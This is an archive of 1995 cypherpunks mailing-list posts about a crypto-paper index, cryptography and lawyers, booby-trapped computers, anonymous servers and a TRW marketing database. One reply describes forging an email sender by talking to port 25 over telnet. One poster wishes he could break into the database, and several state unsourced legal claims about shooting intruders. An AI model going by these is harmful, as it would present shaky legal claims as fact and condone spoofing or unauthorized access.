ILF member who posted the Chaum "Dining || Cryptographers" paper, anonymously, and know that he picked that paper both || because of its importance to his interests and because it was pure text, || with no equations and no diagrams. This made it a natural for scanning. || The model we've used so far is that the format of the papers is independant of the bibliographic information which we index. For example, the NASA system I mentioned has papers in both HTML and Postscript formats. The abstracts (which are what's indexed) simply contain URLs, and don't really care what the document types are. In my experience, most of the target audience for technical papers has access to a postscript previewer (for online viewing) and/or a postscript printer, so postscript tends to be the format of choice. Still, it can be anything; text, PDF, scanned in TIFF files all have worked for us in the past. || 3. In the crypto domain, the papers are much more conveniently concentrated || into a handful of conference proceedings, nearly all published by || Springer-Verlag. (Those great silvery-grey paperbacks.) || || This point about Springer-Verlag relates to Item #1 above. Namely, that || copyright holders (Springer-Verlag, through publishing arrangements with || the conferences) will not take kindly to folks making the papers available || electronically. || || This point, about the limited number of main crypto volumes, also implies || another point: many of these papers refer to other papers in the same || volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will || refer to papers in that volume or earlier volumes). This makes it *even || more advantageous* for a serious researcher to buy the complete set of || volumes. || Now that's a pretty good point. Wonder if we could convince them to make their papers available electronically? 8-) But ignoring them, there still seem to be a fair amount of cryptography papers published as technical reports by individual authors or organizations. These would be what I'd like to see in CTRS. || 4. Authentication issues. Electronic versions of articles will need to be || signed, to prevent unauthorized modifications. The infrastructure for this || is beginning to build, but is clearly not available to many. || || I am confident that someday most journals will be published electronically. || Many people think this likely, whether in 5 years or 15 years. Just too || many advantages. || Another good point, but I think this could easily be marked down as an issue to be worked on after the basic functionality is available. I'd hate to see this as a reason for not doing something. || However--and this is my point--before that happens a huge amount of || negotiation about author's rights to reproduction, about verification of || copies, about royalty payments for copies, etc., has to happen. And, the || display software/hardware is not quite there yet....too many people would || be unable to see the equations and diagrams on the screen. In 5 years, less || of a problem. || || Many authors make their papers available by anonymous ftp, or via the Web. || I think this is the way to do it: let those who feel their papers need || electronic dissemination do so. The author makes the choice. This is exactly the target audience I'm looking for. When an author wants to put a paper up on his FTP or WWW site, I hope they'll also send me the indexing information so that when people want to find it, they can use CTRS. I'm not interested in actually storing a copy of the report, although I'm willing to do so if they cannot make it available any other way. || || In summary, this project is probably premature (technologically), has || numerous copyright issues to be resolved, and is probably less needed in || the crypto community than in some other areas. || || (Granted, we are not following those other areas, necessarily. But that || other domains have not yet gone fully electronic is indicative that others || see some of these same problems, and are likely to address them before the || math/crypto community does.) || I have to disagree strongly about the technologically premature part, since I have had a lot of experience to the contrary during my involvment with several major technical report systems. I'm afraid I also have to disagree with you about the need for this service. Having attempted to find some of the reports which I've heard are available on the Net, I'd have to say it's not a task I'd set an Internet novice too, or one I'd give to someone on a deadline. I think a good bibliographic database like I propose in CTRS would be a definite help. And at the very very very least, it probably won't hurt. 8-) || Sorry to dissect this proposal so thoroughly, but it's one of the things I do. || S'ok with me. It's not like I'm dead set on doing this or anything. It's just an observation, and an offer of service if anyone thinks it'd be useful. Oh, BTW, another thing I probably should mention that seems obvious to me: I'm offering to do this for free. That is, the database would be a public service, with no charge to list papers, add another database to the searching list or to query/retrieve abstracts. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From cort at bioanalytical.com Wed Sep 6 09:54:06 1995 From: cort at bioanalytical.com (Cortland D. Starrett) Date: Wed, 6 Sep 95 09:54:06 PDT Subject: "Living in real time, side A" (article ref) Message-ID: <199509061651.LAA00565@bioanalytical.com> "Living in real time, side A" by Ted Lewis, Naval Postgraduate School, is an extremely concise (<3 pages) and insightful look into the future of information technology and society. Subjects dear to many cypherpunks are indirectly addressed throughout. A detail of particular interest to the lawyers on the list described "A vapor trail of litigation". The author notes that, "Plea bargaining, out-of-court settlements, and appeals are the norm in Post-industrial legal circles. These are all legal devices for delaying the opposition rather than deciding on a proactive course of action. In the Info Age, legal procedures will be too cumbersome and too expensive to accommodate the rate of change." ... "The mechanisms for protecting Info Age property (information) are trade secrets and obsolescence." other key terms: Moore's Law, civilization on speed, inverse economics, rate of change, Direct democracy tending toward anarchy... The article can be found on page 8 of the September issue of IEEE Computer. Cort. (Mistakes in quotes are mine.) From bianco at itribe.net Wed Sep 6 09:55:18 1995 From: bianco at itribe.net (David J. Bianco) Date: Wed, 6 Sep 95 09:55:18 PDT Subject: Searchable Crypto Paper Archive? In-Reply-To: <199509061632.MAA00622@james.bwh.harvard.edu> Message-ID: <199509061650.MAA01945@gatekeeper.itribe.net> On Sep 6, 12:32, Adam Shostack sent the following to the NSA's mail archives: > Subject: Re: Searchable Crypto Paper Archive? || | Anyway, this is what I'd like to see. I'm willing to work on such a || | system if there's enough positive feedback. Does anyone else think || | they'd like to use or contribute to such a system? || | || || I think this would be a fabulously useful service, one which I'd be || glad to subscribe to as an amateur. (I could see forking over $20-50 || for search priority, possibly more if it was really well done). || Ack! Money involved? "Just say no!" 8-) When I said "contribute" I meant placing papers in it, or if you've got a lot already, adding your own database to the list of possible search sites. I wanna do this as a free service. There are several reasons (like I can't see charging people for information that I didn't even produce), but the real reason for doing it is simple: I wanna use it. I made a mock up of CTRS, which is available at: http://www.itribe.net/CTRS/ https://www.itribe.net/CTRS/ (of course we have to offer SSL 8-) There aren't any crypto papers in it yet, though. The iTRiBE database (the only one available for searching right now) is filled with some NASA test data. Try doing searches on things like "ratio" or "nasa" for an example of the output you'd get. || || Don't forget the value of sci.crypt[.research] and cypherpunks || postings, nor of crypto 'rump session' papers. I admit I hadn't thought of these. I'm not sure I could sign up for the task of archiving the newsgroups (disk space) but if the authors/copyright holders of rump papers want to submit them, I'd be happy to index them. I don't think the database necessarily has to be composed only of referreed papers or anything. I'd be happy to index rump papers, technical reports or maybe even presentation materials like postscript copies of overhead transparencies. Anyway, thanks for the reply! -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From tcmay at got.net Wed Sep 6 09:56:34 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 09:56:34 PDT Subject: Searchable Crypto Paper Archive? Message-ID: At 4:45 PM 9/6/95, David J. Bianco wrote: >S'ok with me. It's not like I'm dead set on doing this or anything. It's >just an observation, and an offer of service if anyone thinks it'd be >useful. > >Oh, BTW, another thing I probably should mention that seems obvious to me: > I'm offering to do this for free. That is, the database would be a public >service, with no charge to list papers, add another database to the >searching list or to query/retrieve abstracts. I'll look forward to seeing this, then. I was just noting some issues which seem likely to arise. But if you plan to do this "if anyone thinks it's be useful," then I think it would be useful, so you've met your criterion for doing the project. Good luck! Keep us posted. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cort at bioanalytical.com Wed Sep 6 10:11:51 1995 From: cort at bioanalytical.com (Cortland D. Starrett) Date: Wed, 6 Sep 95 10:11:51 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509061709.MAA00612@bioanalytical.com> As a follow-up to the article reference I posted, I pose the following question: Will cryptographic technology and information (communication) technology reduce the need for legal services in the future? (especially regarding contracts, buying/selling, patent law, etc.) Will legal services just look different? Will they be more efficient (cheaper)? Put bluntly, will cryptography put lawyers out of business? Any comments would be appreciated. Cort. From robl at on-ramp.ior.com Wed Sep 6 10:40:34 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 10:40:34 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509061709.MAA00612@bioanalytical.com> Message-ID: > Will cryptographic technology and information (communication) > technology reduce the need for legal services in the future? > (especially regarding contracts, buying/selling, patent law, etc.) > Will legal services just look different? Will they be more > efficient (cheaper)? > > Put bluntly, will cryptography put lawyers out of business? I certainly expect the world of business to change and reflect the use of crytographic tech as soon as it becomes an acceptable practice to use it. This may take awhile as the media and current administration continue to paint black anyone who wants to use such tech for any reason. Should there come a time, however, when crypto is a fashionable and accepted thing, I would expect to see law offices offering to send and recieve documents using such tech, as well as generating and maintaining keys off-site for clients. With such a legal hoopla being made over crypto, I can not fathom lawyers not getting in on the action.. While the need for lawyers may decline with the increased use of crypto, I do not think they are about to become an endangered species. Those that are smart will find a way to profit from it, while those that can not adapt will be left behind (and who says lawyers are not part of evolution ) RobL From tedwards at src.umd.edu Wed Sep 6 10:54:06 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 6 Sep 95 10:54:06 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <199509060419.XAA04296@einstein.ssz.com> Message-ID: On Tue, 5 Sep 1995, Jim Choate wrote: > As far as I know the owner of property has no legal right to kill a person > either traspassing or stealing it in any of the 50 states. There was a > recent federal ruling that basicly says that if you meet a burglar in your > home at nite you can not kill or otherwise harm them unless you're life is > directly threatened. In short, you MUST give up the ground if at all > possible. In Maryland you have the responsibility to retreat if possible when confronted by someone threatening your life or limb. If you are unable to retreat or are in your domicile (or motel room, etc.) you have the right to use deadly force to stop an attack. You certainly do not have the right to use deadly force against someone for any other reason than immediate threat of life or limb to you or someone else. -Thomas From tedwards at src.umd.edu Wed Sep 6 10:56:41 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 6 Sep 95 10:56:41 PDT Subject: Anonymous CU-SeeMe reflector Message-ID: If anybody has worked on or is interested in working on creating an anonymous CU-SeeMe reflector, please contact me (where anonymous in this case means that CU-SeeMe clients do not report the proper IP numbers of other clients). I've done a bit of work on it but can't quite get "normal" reflector behaviour. -Thomas Edwards From dlambert at aigtc.com Wed Sep 6 11:36:35 1995 From: dlambert at aigtc.com (Dave Lambert) Date: Wed, 6 Sep 95 11:36:35 PDT Subject: Anonymous http daemon? Message-ID: <199509061821.OAA01040@ptolemy> Hi. Some time ago, there were some discussions concerning an anonymous http daemon. As far as I can recall, the discussion just sort of trailed off, and nothing got implemented. I'm considering making an anonymous server available, and would like: 1. to know whether I need to hack some code (or if someone has done so already) 2. to reopen the discussion of the desirable characteristics such a beast would possess. - David C. Lambert dlambert at aigtc.com From alt at iquest.net Wed Sep 6 11:39:07 1995 From: alt at iquest.net (Al Thompson) Date: Wed, 6 Sep 95 11:39:07 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: At 02:00 AM 9/6/95 -0400, Black Unicorn wrote: >Created crimes are few and far between. You mean like buying a 30 round magazine, or putting a different stock of your choice on a rifle, or owning an automatic weapon, or mailing crypto out of the country, or hiring someone due to their race, or not hiring someone because they are "fat?" From robl at on-ramp.ior.com Wed Sep 6 11:56:50 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 11:56:50 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509061834.NAA27747@freeside.fc.net> Message-ID: > Rob, > > re: Will Cryptography put lawyers out of business? > > I see no connection between the use/non-use of crypto and the > occurrence/non-occurrence of the conflicts and threats of conflicts > which give rise to the use of lawyers. What's the connection? I know from my employers perspective, that lawyers are retained for more than just litigation. Often they handle the exchange of critical documents and transactions that need to be kept confidential. The impact of crypto as I see it is a reduction in the use of legal services of this nature, not in litigation. Using a lawyer to pass on tech specs on a new product to the patent office is a common occurance, as it is assumed that the lawyer can maintain the secrecy required for handling these documents. Should the patent office offer a key, you could just as easily send an encrypted message in place of a lawyer handling this. There are bound to be other options and opportunities as well for lawyers to use crypto.. securing a companies documents or whatever. RobL From robl at on-ramp.ior.com Wed Sep 6 12:06:02 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 12:06:02 PDT Subject: Are booby-trapped computers legal? In-Reply-To: Message-ID: > > As far as I know the owner of property has no legal right to kill a person > > either traspassing or stealing it in any of the 50 states. There was a > [...] > In Maryland you have the responsibility to retreat if possible when [...] > You certainly do not have the right to use deadly force against someone > for any other reason than immediate threat of life or limb to you or > someone else. Being a freedom loving, gun owner, with an interest in maintaining both my rights to guns, and my right to cryto, I am saddened to see that you have to retreat at all. As far as I am concerned, if I am in my house, and someone uninvited is in there also (burglar/thief/psycho/whatever) then I have already sufficiently retreated.. and they will likely be shot. Anyone invading my home is considered a threat to my wife, children and myself. I had heard that in the state of Texas, intruders/trespassers are at their own risk after sundown, as it is legal to fire upon them at that point, regardless of thier intent.. I have not been able to confirm this, as of yet.. but am looking for the answer in my meager spare time. RobL From tcmay at got.net Wed Sep 6 12:18:09 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 12:18:09 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: At 6:32 PM 9/6/95, Al Thompson wrote: >At 02:00 AM 9/6/95 -0400, Black Unicorn wrote: > >>Created crimes are few and far between. > >You mean like buying a 30 round magazine, or putting a different >stock of your choice on a rifle, or owning an automatic weapon, >or mailing crypto out of the country, or hiring someone due to their >race, or not hiring someone because they are "fat?" Or drinking alcohol, or owning gold, or possessing a copy of a Traci Lords video, or selling bullets recently declared illegal, or having a "men only" gym (but "women only" gyms are legal), or making condoms available, or not making condoms available, or teaching women how to use birth control, or denying a Satanist a job at a child care center on the basis of his religious beliefs, and so on. Too many transient, created crimes. To answer Lucky's original question, one way to measure the total number of new laws--most of them covering "created crimes"--is to measure the total number of volumes of statutes at the Federal, state, and local levels. I've seen figures on the "linear feet" of regulations, and how they are growing exponentially, but I don't recall the numbers. Something like the total number of laws doubling every 10 years or so, but don't quote me on this one. Whether these are "created crimes" in most cases is unclear, but certainly the really basic crimes (murder, assault, rape, theft, etc.) were adequately covered 20 years ago, or 50 years ago, etc. I can see some reasons for refining the definitions in the light of new situations, but I have to conclude that _most_ of the vast number of new laws and statutes deal with "created crimes," as I understand the term. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hallam at w3.org Wed Sep 6 12:39:50 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 6 Sep 95 12:39:50 PDT Subject: Are booby-trapped computers legal? In-Reply-To: Message-ID: <9509061938.AA02249@zorch.w3.org> Under UK law it is certainly illegal to create any device with the intention of causing greivous bodily harm to anyone. The right to self defense is very precisely that, the right to take reasonable steps to defend yourself with commensurate force if attacked. If someone hits you in the face you do not have the right to kill him. If someone tries to do serious harm to you and the only way to avoid that harm is to kill them that is self defense. There is no self defense argument where the purpose is not to prevent physical harm. Any device intended to cause harm to someone tampering with a computer could well land the perpetrator in jail for a very long time for attempted murder or murder. People who go round drawing parallels to gun ownership and cryptography ownership are simply playing into the governments hands. Cryptography has net benefits to society. Most advocates of gun ownership tend to convince me of little more than they are a danger to society. Regardless of their case they are the biggest argument for gun control, and therfore poor advocates of their cause. I see their attempts to draw parallels with cryptography to be little more than trying to shore up their sinking ship with one thats afloat. Phill From dsc at swcp.com Wed Sep 6 12:52:37 1995 From: dsc at swcp.com (Dar Scott) Date: Wed, 6 Sep 95 12:52:37 PDT Subject: cryptography eliminates lawyers? Message-ID: Cort Starrett wrote, >Put bluntly, will cryptography put lawyers out of business? Even in a cryptoanarchy I would want to treat customers kindly and I would want to make sure that in any agreement that both parties are clear as to when we are complying or not. A lawyer might help in complex cases. Especially if UCC is referenced. And in some kinds of escrow a "judge" might be invoked if there is a despute. The judge might be a lawyer or might bring in a lawyer as an expert. The nature of the work of a lawyer in a crytoanarchy might be very different. Lawyers might even become highly respected and liked! Dar (list newbie) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From sandfort at crl.com Wed Sep 6 12:52:47 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Wed, 6 Sep 95 12:52:47 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509061709.MAA00612@bioanalytical.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Wed, 6 Sep 1995, Cortland D. Starrett wrote: > Will cryptographic technology and information (communication) > technology reduce the need for legal services in the future? > (especially regarding contracts, buying/selling, patent law, etc.) > Will legal services just look different? Will they be more > efficient (cheaper)? The U.S. legal system is in free fall, and lawyers are almost totally to blame. ("Lawyers" as used here includes all judges and most legislators.) This does not mean, however, that cryptographic/information/communications technologies can forgo the use of advocates and arbitors. There will always be a place for people who can fulfill these functions. They may or may not be called lawyers, but most of the same folks who now go into law, will be the dispute specialists of cyberspace. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From scottg at b4a206.mdc.com Wed Sep 6 13:28:28 1995 From: scottg at b4a206.mdc.com (TECO Master) Date: Wed, 6 Sep 95 13:28:28 PDT Subject: Where is Secure Drive 1.4? Message-ID: <95090613224714@b4a206.mdc.com> -----BEGIN PGP SIGNED MESSAGE----- Hi Folks, I have a previous version of SecureDevice (v1.3). Is v1.4 the current version or something higher? Where is an FTP site so I can grab it? TIA, scott gallaher | I believe in the 1st Amendment. TECO Master & DBA | Pornography is just a fringe benefit. PGP Key fingerprint: AD A8 C9 AA D7 D3 6A E3 0C 58 5A 10 41 37 45 EE GCS d- s+: a C++++ U->L++++ P? L>+++ !E[teco+++] W N++ k- w--- !O M- V$ PS+ PE Y++ PGP(++) t+ !5 X R(++) tv+ b++(+++) DI+ !D G e++ h----(*) r+++ y++++(++*) -- Geek Code V3.0 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBME4SV9PstJd5R1NxAQFN9wH/UYh59UzgBKotUs/HDYJ7jHEPlcmOIy/E Zo74KQcSb9QtaPMntSpHiZq3W1ZaIRrl+jx9HkZbsBbXHRVi7+HGXQ== =xvbE -----END PGP SIGNATURE----- From cg at bofh.lake.de Wed Sep 6 13:29:12 1995 From: cg at bofh.lake.de (Cees de Groot) Date: Wed, 6 Sep 95 13:29:12 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: > > This is the second or third time I've seen descriptions of such > raids where cult (no, I'm not trying to be diplomatic) > representatives were present and participating. Is this legal in > Amsterdam? How about in the U.S.? Britain? > Probably. Amsterdam isn't exactly the wild west, and they didn't take the computer equipment with them, they just inventoried everything so to have something to sell when their claims prove valid. Which I doubt (shit, I will be moving to this country in a couple of weeks...) > If a police officer has a warrant then I really don't have much > choice about letting him in. Am I also under an obligation to > allow the people who filed for the warrant into my home or > business? > I don't know whether this is valid. I assume so. I also think it is about time we develop some ideas about anonymous web publishing. Probably some chained cgi scripts could do, but how to get around traffic analysis? -- Cees de Groot, OpenLink Software 262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers] http://www.lake.de/sonst/homepages/s2449/index.html From dneal at usis.com Wed Sep 6 13:51:15 1995 From: dneal at usis.com (David Neal) Date: Wed, 6 Sep 95 13:51:15 PDT Subject: Collection of personal info Message-ID: I sent this to the risks moderator some time back, but I guess he didn't like it. For those of you who think that perhaps people advocating cybercash are just a bunch of paranoid lunatics. -------------- As advertised in the trade magazine "DM News" (Direct Marketing News), Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement, any typos are mine. >From the huge number of people in the database, it would seem that TRW is now marketing a subset of their credit records they keep on everyone. Does anyone else remember the flap over Lotus' product (Magellan) that was going to allow something similar? The risks? This is the perfect database if you want to red-line your offerings. I'm sure others will have more creative answers. -------------- TRW DISCOVERED Some very smart people are uncovering exciting ways to increase response rates, find profitable customers, and develop new market niches. It's been a well kept secret. Now it's out. It's TRW. It all started with the search for more creative information solutions. Solutions that help you discover hidden markets and unique ways of using ordinary data to target qualified prospects. The result: a proven and massive database in the hands of people with real data management know-how. So far the findings have revealed: o A database of 170+ million consumers o 100+ demographic, psychographic and geographic selects o A full range of computer services. o Comprehensive motor vehicle data >From this comes an array of products and services to intrigue even the most seasoned direct marketer. One of these is called the TRW Smart Targeting Tools (SM). It links 98 million households with the goods and services they are most likely to buy. Choose consumer names by 50 neighborhood or 3600 household level clusters, by 56 broad product categories or by 516 specific product or brand preferences. Looking at all the advantages, TRW may be the direct marketer's find of this century. And the next. Energize your marketing. Contact your TRW representative or call 800.527.3933 Ext 640. You have a great find ahead of you. TRW Target Marketing Services Your one source for reaching all the right people. 701 TRW Parkway Allen, TX 75002-3717 800.527.3933 David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From bdolan at use.usit.net Wed Sep 6 14:18:30 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 6 Sep 95 14:18:30 PDT Subject: booby-traps, crypto, guns, and tea In-Reply-To: <9509061938.AA02249@zorch.w3.org> Message-ID: On Wed, 6 Sep 1995 hallam at w3.org wrote: > > Under UK law it is certainly illegal to create any device with the > intention of causing greivous bodily harm to anyone. The right to self > defense is very precisely that, the right to take reasonable steps to > defend yourself with commensurate force if attacked. [...] > > People who go round drawing parallels to gun ownership and cryptography > ownership are simply playing into the governments hands. Cryptography has net > benefits to society. Most advocates of gun ownership tend to convince me of > little more than they are a danger to society. Regardless of their case they are > the biggest argument for gun control, and therfore poor advocates of their > cause. I see their attempts to draw parallels with cryptography to be little > more than trying to shore up their sinking ship with one thats afloat. > > > Phill > King George didn't like us owning guns either. I'm pleased my ancestors had a difference of opinion with him concerning this and a few other things. Brad From tms at TIS.COM Wed Sep 6 14:34:39 1995 From: tms at TIS.COM (Thomas M. Swiss) Date: Wed, 6 Sep 95 14:34:39 PDT Subject: Collection of personal info In-Reply-To: Message-ID: <199509062125.RAA10123@ziggy.tis.com> David Neal writes: >I sent this to the risks moderator some time back, but I guess >he didn't like it. I can guess why; PGN might be skeptical of your precognitive powers. B-> >... >As advertised in the trade magazine "DM News" (Direct Marketing News), >Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement, ^^^^ -Tom Swiss / tms at tis.com From dneal at usis.com Wed Sep 6 14:44:05 1995 From: dneal at usis.com (David Neal) Date: Wed, 6 Sep 95 14:44:05 PDT Subject: Collection of personal info In-Reply-To: <199509062125.RAA10123@ziggy.tis.com> Message-ID: On Wed, 6 Sep 1995, Thomas M. Swiss wrote: > > David Neal writes: > > >I sent this to the risks moderator some time back, but I guess > >he didn't like it. > > I can guess why; PGN might be skeptical of your precognitive powers. B-> > > >... > >As advertised in the trade magazine "DM News" (Direct Marketing News), > >Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement, > ^^^^ Well, I did say all typos were _mine_ -- That's 1995 folks, just for the record and thanks to Tom Swiss for being the first in a long line of people who will point this out. :-) But back to the topic; am I the only one who gets the willies just reading this? From adam at bwh.harvard.edu Wed Sep 6 14:57:13 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 6 Sep 95 14:57:13 PDT Subject: Collection of personal info In-Reply-To: Message-ID: <199509062144.RAA05718@cushing.bwh.harvard.edu> | But back to the topic; am I the only one who gets the willies just | reading this? No. But the interesting question is, what to do about it? The answer in part, is personal anonymity through cash and avoiding US IDs. But in the long run, thats broken. You can't have privacy for 1000 people; they'll just toss us all in jail. In the long run, we need to convince most Americans that their freedom is worth more than the Drug War. The only way to do that is to look and sound reasonable, and convince people a few at a time. Do it with letters to the editor, editorials, articles for your local newspaper, discussions on the street. Try not to rant; if you sound like a nut, people dismiss your ideas along with you. Be reasonable and measured. Use a spell checker. Stick to one idea, and give a few backing points. Don't insult your opponent. Don't try for a convoluted closing or slogan. (This isn't to disparage the creation of new facts, like an international remailer network. I am saying that the problems are as much political as technological.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From robl at on-ramp.ior.com Wed Sep 6 15:16:06 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 15:16:06 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > Well, I did say all typos were _mine_ -- That's 1995 folks, just for the > record and thanks to Tom Swiss for being the first in a long line > of people who will point this out. :-) -would you expect anything less from us? > > But back to the topic; am I the only one who gets the willies just > reading this? Beyond having the willies.. This is more than just scary, it feels like rape when you think about it for awhile. Everything you buy, on credit, is recorded and sold to someone who wants to know your secrets. Everytime you make a banking transaction, someone is watching and compiling the data. Is there any legal recourse to get your name removed from the sellable list? Or is it too late and we can not save even the vestiges of our privacy? Oh, but if only I had the 'hacker' skill to break into such a database.. I have always been against the destruction of data.. but there are exceptions... RobL From loki at obscura.com Wed Sep 6 15:51:05 1995 From: loki at obscura.com (Lance Cottrell) Date: Wed, 6 Sep 95 15:51:05 PDT Subject: Direct Socket to Remailer? Message-ID: At 11:41 PM 9/3/95, starrd at iia2.org wrote: >On Fri, 1 Sep 1995, Lance Cottrell wrote: > >> You should try the telnet port 25 trick. It is amazingly simple (but not >> secure). Just "telnet some.machine.com 25" and type help. It will guide you >> through it. It is quite informative. > >Se sure to test it first, sometimes it records who *really* sent it as >well as the "forged" return address. > >Test it by mailing to yourself and then look at all the headers. > I should have been more clear. I was advocating this as interesting and educational, not as an effective anonymity technique. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From tcmay at got.net Wed Sep 6 16:09:51 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 16:09:51 PDT Subject: Collection of personal info Message-ID: At 8:39 PM 9/6/95, David Neal wrote: >From the huge number of people in the database, it would seem that TRW >is now marketing a subset of their credit records they keep on everyone. >Does anyone else remember the flap over Lotus' product (Magellan) that >was going to allow something similar? > >The risks? This is the perfect database if you want to red-line your offerings. >I'm sure others will have more creative answers. About the Lotus Marketplace product of several years ago, many of us thought at the time that the furor was misdirected, and the result ultimately damaging to privacy concerns. Why? Because the ZIP code data is _already_ available to the mass marketers, etc. The Marketplace produce merely made it available to "the rest of us," allowing many people to have their eyes opened about what exists. By getting Lotus to pull the product, the public went back to sleep, lulled into the false sense of privacy that their ZIP codes were once against private. Privacy needs to be protected by keeping some things secret, not by passing laws limiting the records others can collect from public or voluntarily offered information. Don't get me wrong--I don't like TRW Credit, Equifax, TransUnion, or anyone else compiling "dossiers" on my spending habits, my travel itineraries, etc. But by using my VISA and MasterCard cards, and by agreeing to their terms and conditions, I am tacitly accepting that credit reporting agencies will have access to my transactions. If there is a "market for privacy," and this is something we've talked about before, then someone will offer "The Privacy Card." We can debate what this card might offer, randing from complete unlinkability (ecash protocols of various sorts) to non-reporting of records to the Big Three of credit reporting agencies. Even cards issued in the name of pseudonyms, of various sorts and backings. Should there be laws _against_ this kind of Privacy Card, we should fight these laws. But we should not lull ourselves into a false sense of security by adopting the unconstitutional and anti-liberty approach of having "Fair Credit Reporting Act" and "Data Privacy Act" sorts of laws. In my opinion, of course. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Sep 6 16:16:27 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 16:16:27 PDT Subject: Collection of personal info Message-ID: At 10:15 PM 9/6/95, Rob Lowry wrote: >Beyond having the willies.. This is more than just scary, it feels like >rape when you think about it for awhile. Everything you buy, on credit, is >recorded and sold to someone who wants to know your secrets. Everytime >you make a banking transaction, someone is watching and compiling the >data. > >Is there any legal recourse to get your name removed from the sellable list? >Or is it too late and we can not save even the vestiges of our privacy? Rob, I have entered this posting of yours into the "BlackNet Dossier Service" I operate. Sounds creepy and scary, eh? Well, it's part of freedom. The "legal recourse" you mention about having your name taken off lists kept by people or agencies ultimately involves visits by the authorities to private homes (like mine) to verify that the data are being "properly collected" and that no "illegal or incorrect data" are being stored. If someone wants something kept secret, the solution is to keep it secret. If someone doesn't want their postings going into my 220 megabyte file of postings, they shouldn't send them to me. Or they should adopt a digital pseudonym, unlinkable to their True Name or any other nyms they may have. Things are much simpler and less stressful when you don't look to the law to fix things. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From terrell at sam.neosoft.com Wed Sep 6 16:25:19 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Wed, 6 Sep 95 16:25:19 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509062335.SAA02364@sam.neosoft.com> >From: "Cortland D. Starrett" >Subject: cryptography eliminates lawyers? >As a follow-up to the article reference I posted, I pose the >following question: > >Will cryptographic technology and information (communication) >technology reduce the need for legal services in the future? >(especially regarding contracts, buying/selling, patent law, etc.) >Will legal services just look different? Will they be more >efficient (cheaper)? > >Put bluntly, will cryptography put lawyers out of business? >Any comments would be 